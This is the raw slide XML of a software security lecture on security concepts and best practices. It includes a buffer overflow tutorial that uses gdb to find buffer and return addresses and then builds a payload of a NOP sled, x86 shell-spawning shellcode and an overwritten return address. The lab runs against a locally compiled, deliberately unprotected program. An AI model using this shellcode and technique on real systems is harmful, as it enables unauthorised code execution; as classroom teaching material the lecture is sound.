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64" r:id="rId12"/>
    <p:sldId id="281" r:id="rId13"/>
    <p:sldId id="265" r:id="rId14"/>
    <p:sldId id="282" r:id="rId15"/>
    <p:sldId id="283" r:id="rId16"/>
    <p:sldId id="286" r:id="rId17"/>
    <p:sldId id="267" r:id="rId18"/>
    <p:sldId id="287" r:id="rId19"/>
    <p:sldId id="288" r:id="rId20"/>
    <p:sldId id="268" r:id="rId21"/>
    <p:sldId id="289" r:id="rId22"/>
    <p:sldId id="290" r:id="rId23"/>
    <p:sldId id="269" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="292" r:id="rId26"/>
    <p:sldId id="279" r:id="rId27"/>
    <p:sldId id="280" r:id="rId28"/>
    <p:sldId id="273" r:id="rId29"/>
    <p:sldId id="274" r:id="rId30"/>
    <p:sldId id="275" r:id="rId31"/>
    <p:sldId id="276" r:id="rId32"/>
    <p:sldId id="277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63" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100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AAC35-B9EF-C846-98B4-63503093AC60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0EF0F-C99A-AA4E-889C-CEF3D438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proposed ranking is based on years of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> experience that Gary McGraw acquired by applying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>touchpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to many different types of organizations ranging from independent software vendors to huge credit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>card consortium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0EF0F-C99A-AA4E-889C-CEF3D43885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175F-39A9-994F-AEF5-8EBA8423B573}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25/01/19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B6F4-192A-BE4A-A8F3-8CB85A20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3"/>
            <a:ext cx="9144000" cy="4341830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Lecture 2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Concepts &amp; Best Practices </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Touchpoints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9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627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The First Thing to do is to find the address where the buffer starts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2019-01-27 at 20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682750"/>
            <a:ext cx="4502150" cy="5175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4334" y="4631764"/>
            <a:ext cx="5685365" cy="41536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9803" y="4530164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754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Find Start Address of Buffer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5005" y="2162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57752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Compile your example using the following command</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>﻿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> -o example -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>execstack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boverflow.c</a:t>
            </a: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952219"/>
            <a:ext cx="8521700" cy="1559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Note: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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-stack-protector === Removes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>alignment space at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the end of the buffer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-m32 === Sets the program to compile into a 32 bit program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-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> === Makes the stack executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205314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Find Start Address of Buffer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611663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Start gdb</a:t>
            </a:r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g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>db a.out</a:t>
            </a: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5005" y="2162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141229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Disassemble the main function to identify the point where you would like to stop the program execution to visualize the state of the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/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g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>db </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>isas main</a:t>
            </a:r>
            <a:endParaRPr lang="x-none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768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1-25 at 18.48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81000"/>
            <a:ext cx="5613400" cy="576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4300" y="3898899"/>
            <a:ext cx="5258079" cy="1706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6600" y="3365701"/>
            <a:ext cx="331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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>trcpy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>instruction</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="28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2798" y="4542200"/>
            <a:ext cx="309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Ideally you want to understand how the stack looks like after you execute the unsafe instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy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0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1-25 at 18.48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81000"/>
            <a:ext cx="5613400" cy="576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4300" y="3898899"/>
            <a:ext cx="5258079" cy="1706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29300" y="2868082"/>
            <a:ext cx="331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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>trcpy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>instruction</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="28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4301" y="4361688"/>
            <a:ext cx="1143000" cy="1706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8300" y="6146800"/>
            <a:ext cx="331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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>et breakpoint here</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="28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13500" y="3492500"/>
            <a:ext cx="228879" cy="406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3900" y="4532377"/>
            <a:ext cx="660400" cy="1614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2798" y="4542200"/>
            <a:ext cx="309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Ideally you want to understand how the stack looks like after you execute the unsafe instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy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4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/>
              <a:t>Find Start Address of Buffer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443841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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>nsert a breakpoint in the location immediately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>after the strcpy instruction</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>reak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>*0x0804846f</a:t>
            </a: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5005" y="2162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616" y="3014229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Identify the start of the buffer in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>﻿run $(python -c "print('A'*256)")</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="28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3968336"/>
            <a:ext cx="0" cy="781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2200" y="4749800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instruction runs the program writing in the buffer 256 ‘A’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/>
              <a:t>Find Start Address of Buffer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443841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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>nsert a breakpoint in the location immediately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>after the strcpy instruction</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>reak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>*0x0804846f</a:t>
            </a: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5005" y="2162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616" y="3014229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Identify the start of the buffer in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>﻿run $(python -c "print('A'*256)")</a:t>
            </a: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616" y="4160244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Inspect the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x/200xb $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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435" y="5730074"/>
            <a:ext cx="464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in some cases you will have to replace $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> if you are using a virtual machine.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82800" y="5194300"/>
            <a:ext cx="0" cy="350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21100" y="4749800"/>
            <a:ext cx="7747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7100" y="4426634"/>
            <a:ext cx="464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instruction tells you want to examine 200 bytes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) in the stack (</a:t>
            </a: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esp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will use the hexadecimal format (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>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4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5300" y="448481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buffer starts where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>0x41</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>commences.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0x41 represents character ‘A’ which wash written in the buffer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 descr="Screen Shot 2019-01-25 at 19.0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68475"/>
            <a:ext cx="6350000" cy="4565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099" y="2115695"/>
            <a:ext cx="1117601" cy="2917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1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627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The address of the buffer was found</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2019-01-27 at 20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682750"/>
            <a:ext cx="4502150" cy="5175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903" y="4580964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0xffffd020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38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627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Find the Location of the Return Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2019-01-27 at 20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682750"/>
            <a:ext cx="4502150" cy="5175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903" y="4580964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0xffffd020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7201" y="2714064"/>
            <a:ext cx="3644900" cy="41536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669" y="2612464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249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67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Security Concepts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/>
              <a:t>Asset, Vulnerability, Attack, Threat, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exposure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Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implementation bugs VS Design flaws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Tutorial: Launching a Buffer Overflow Attack</a:t>
            </a:r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Security Best Practices</a:t>
            </a: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Objectives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681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Find the Location of the Return Address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443841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Run the program progressively increasing the number of As until we get an overflow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5005" y="2162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616" y="284051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Identify the start of the buffer in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>﻿run $(python -c "print('A'*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>260)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2800" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="28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616" y="4391364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Segmentation fault at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>260</a:t>
            </a:r>
            <a:endParaRPr lang="x-none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14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Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" b="1" smtClean="0"/>
              <a:t>the Location of the Return Address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5005" y="2162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creen Shot 2019-01-27 at 21.2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162297"/>
            <a:ext cx="8661400" cy="1260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7800" y="2828363"/>
            <a:ext cx="3936999" cy="59418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7500" y="351394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This means that the return address contains character ‘A’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/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You can double check it, asking gdb to show the content of the instruction pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>($eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2019-01-27 at 21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5748923"/>
            <a:ext cx="3096724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627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Find the Location of the Return Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2019-01-27 at 20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682750"/>
            <a:ext cx="4502150" cy="5175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903" y="4580964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0xffffd020</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Left Bracket 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257003" y="2806700"/>
            <a:ext cx="1378122" cy="2185129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003" y="3749967"/>
            <a:ext cx="652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260</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US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340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Craft the Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Screen Shot 2019-01-27 at 20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390491"/>
            <a:ext cx="4502150" cy="51752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48275" y="1517491"/>
            <a:ext cx="36544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 smtClean="0"/>
              <a:t>The objective is to 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400" dirty="0" smtClean="0"/>
              <a:t>Place the malicious code inside the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="x-none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x-none" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Write inside the Return address the start address of the buffer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>0xffffd020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="24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4703" y="2409264"/>
            <a:ext cx="150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0xffffd024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882900" y="2807429"/>
            <a:ext cx="2117342" cy="8374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82900" y="265430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2100" y="3365501"/>
            <a:ext cx="2117342" cy="273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8200" y="3816191"/>
            <a:ext cx="1414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Malicious </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>code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82900" y="421640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2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Craft the Attack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7200" y="1390491"/>
            <a:ext cx="84336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We will write 260 bytes from the starting position of the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>214 bytes will represent the No Operation Nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The remaining 46 characters will represent the shellcode of the command that launches a shell.</a:t>
            </a:r>
            <a:endParaRPr lang="x-none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05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Craft the Attack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7457" y="1505396"/>
            <a:ext cx="8633377" cy="381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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>un $(python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>c “print(‘\x90’*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>214+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sz="600" dirty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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x31\xc0\xb0\x46\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x31\xc9\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x80\xe8\xe5\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\x2f\x62\x69\x6e\x2f\x73\x68’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>’+’\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x20\xd0\xff\xff’)”)</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2400" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="x-none" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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7405" y="1522557"/>
            <a:ext cx="6594295" cy="4633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743291"/>
            <a:ext cx="8433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400" dirty="0" smtClean="0"/>
              <a:t>The no operation is represented by code ‘\x90’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96287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Craft the Attack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405" y="2010945"/>
            <a:ext cx="8233429" cy="186255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4690884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Shellcode for Linux x86 representing the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>to execute a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2800" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r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Note you will have to change this command to suit a your platform.</a:t>
            </a:r>
            <a:endParaRPr lang="x-none" sz="2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7457" y="1505396"/>
            <a:ext cx="8633377" cy="381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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>un $(python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>c “print(‘\x90’*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="x-none" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>214+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sz="600" dirty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‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x31\xc0\xb0\x46\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\x31\xc9\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
